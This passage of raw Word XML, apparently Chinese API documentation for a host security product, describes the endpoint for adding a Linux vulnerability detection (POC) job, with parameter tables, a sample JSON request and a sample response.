            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED34CB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测方式,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D2367EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="675E1546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F630828" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map&lt;String, Object&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353CA552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="729F1CDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输入参数 ,可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32571C42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3E10C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/add</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "liangyong_test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronEnabled": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmName": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "ceshi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pocTaskCreateParams": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042016002534",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeTypes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "params": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D77BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502709C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "id": "5c417ad07d761b3224c4280a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "comId": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "uuid": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "liangyong_test1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "ceshi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "createTime": "2019-01-18 15:05:52",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "updateTime": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronEnabled": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cron": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronTaskId": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "osTags": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmName": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "lastExecuteTime": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE6CF6"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753"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1672"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="52DD228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296DB28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60625370" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3727DB96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1FD28D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33A628F3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0882241B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03AFE6D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E37A771" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="081F4BA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BFB8691" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="087DBF9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B2C622B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50BEE2B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="460B5653" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A246BEF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B664F67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F00FD61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44055FB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D358B0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20E490E7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524D6D1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F5FE1B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C628D03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC85EAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D662B8E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B97AC08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04AF9F01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="607392A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCDC75D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AFE8680" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A1A83A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BBF710C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6080C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7338F43C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3EC2548B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="417ABB22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C69F114" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27524B0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B163A2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="089A0962" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="403238EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BED388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C5F6C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7598F91F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3EE519E0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1866B677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3772C01C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4840B396" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75364AEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FED4CE0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761E6DA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0860AFBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00423E54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="085DC222" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="232A415D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DAAE9E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40DC513F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F25A58E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="424D1BA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55EBB7E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271A5E02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="399548AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F11AF13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54763568" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58177613" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EFA68E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7796BC1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CBB4A5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6821145F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="784D65B4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17199085" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC9FB15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B23A62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D768EB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C43B42F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="编辑漏洞检测作业请求"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r>
        <w:t>编辑漏洞检测作业请求</w:t>
      </w:r>
    </w:p>
